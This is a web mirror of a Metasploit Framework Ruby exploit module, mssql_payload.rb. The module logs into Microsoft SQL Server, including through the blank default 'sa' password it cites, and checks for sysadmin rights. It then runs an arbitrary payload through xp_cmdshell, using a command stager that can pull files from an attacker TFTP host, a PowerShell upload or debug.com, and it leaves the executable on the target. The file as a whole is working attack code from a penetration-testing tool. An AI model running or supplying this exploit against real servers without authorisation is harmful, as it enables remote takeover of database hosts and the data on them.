Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/mssql/mssql_payload.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::MSSQL
10
include Msf::Exploit::CmdStager
11
include Msf::OptionalSession::MSSQL
12
# include Msf::Exploit::CmdStagerDebugAsm
13
# include Msf::Exploit::CmdStagerDebugWrite
14
# include Msf::Exploit::CmdStagerTFTP
15
16
def initialize(info = {})
17
super(
18
update_info(
19
info,
20
'Name' => 'Microsoft SQL Server Payload Execution',
21
'Description' => %q{
22
This module executes an arbitrary payload on a Microsoft SQL Server by using
23
the "xp_cmdshell" stored procedure. Currently, three delivery methods are supported.
24
25
First, the original method uses Windows 'debug.com'. File size restrictions are
26
avoided by incorporating the debug bypass method presented by SecureStat at
27
Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems.
28
29
A second method takes advantage of the Command Stager subsystem. This allows using
30
various techniques, such as using a TFTP server, to send the executable. By default
31
the Command Stager uses 'wcsript.exe' to generate the executable on the target.
32
33
Finally, ReL1K's latest method utilizes PowerShell to transmit and recreate the
34
payload on the target.
35
36
NOTE: This module will leave a payload executable on the target system when the
37
attack is finished.
38
},
39
'Author' => [
40
'David Kennedy "ReL1K" <kennedyd013[at]gmail.com>', # original module, debug.exe method, powershell method
41
'jduck' # command stager mods
42
],
43
'License' => MSF_LICENSE,
44
'References' => [
45
# 'sa' password in logs
46
[ 'CVE', '2000-0402' ],
47
[ 'OSVDB', '557' ],
48
[ 'BID', '1281' ],
49
50
# blank default 'sa' password
51
[ 'CVE', '2000-1209' ],
52
[ 'OSVDB', '15757' ],
53
[ 'BID', '4797' ]
54
],
55
'Platform' => 'win',
56
'Arch' => [ ARCH_X86, ARCH_X64 ],
57
'Targets' => [
58
[ 'Automatic', {} ],
59
],
60
'CmdStagerFlavor' => 'vbs',
61
'DefaultTarget' => 0,
62
'DisclosureDate' => '2000-05-30',
63
'Notes' => {
64
'Reliability' => UNKNOWN_RELIABILITY,
65
'Stability' => UNKNOWN_STABILITY,
66
'SideEffects' => UNKNOWN_SIDE_EFFECTS
67
}
68
)
69
)
70
register_options(
71
[
72
OptString.new('METHOD', [ true, 'Which payload delivery method to use (ps, cmd, or old)', 'cmd' ])
73
]
74
)
75
end
76
77
def check
78
if session
79
set_mssql_session(session.client)
80
end
81
82
unless session || mssql_login_datastore
83
vprint_status("Invalid SQL Server credentials")
84
return Exploit::CheckCode::Detected
85
end
86
87
mssql_query("select @@version", true)
88
if mssql_is_sysadmin
89
vprint_good "User #{datastore['USERNAME']} is a sysadmin"
90
Exploit::CheckCode::Vulnerable
91
else
92
Exploit::CheckCode::Safe
93
end
94
ensure
95
disconnect
96
end
97
98
# This is method required for the CmdStager to work...
99
def execute_command(cmd, opts)
100
mssql_xpcmdshell(cmd, datastore['VERBOSE'])
101
end
102
103
def exploit
104
if session
105
set_mssql_session(session.client)
106
else
107
unless mssql_login_datastore
108
print_status("Invalid SQL Server credentials")
109
return
110
end
111
end
112
113
method = datastore['METHOD'].downcase
114
115
if (method =~ /^cmd/)
116
tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
117
execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
118
else
119
# Generate the EXE, this is the same no matter what delivery mechanism we use
120
exe = generate_payload_exe
121
122
# Use powershell method for payload delivery if specified
123
if (method =~ /^ps/) or (method =~ /^power/)
124
powershell_upload_exec(exe)
125
else
126
# Otherwise, fall back to the old way..
127
mssql_upload_exec(exe, datastore['VERBOSE'])
128
end
129
end
130
131
handler
132
disconnect
133
end
134
end
135
136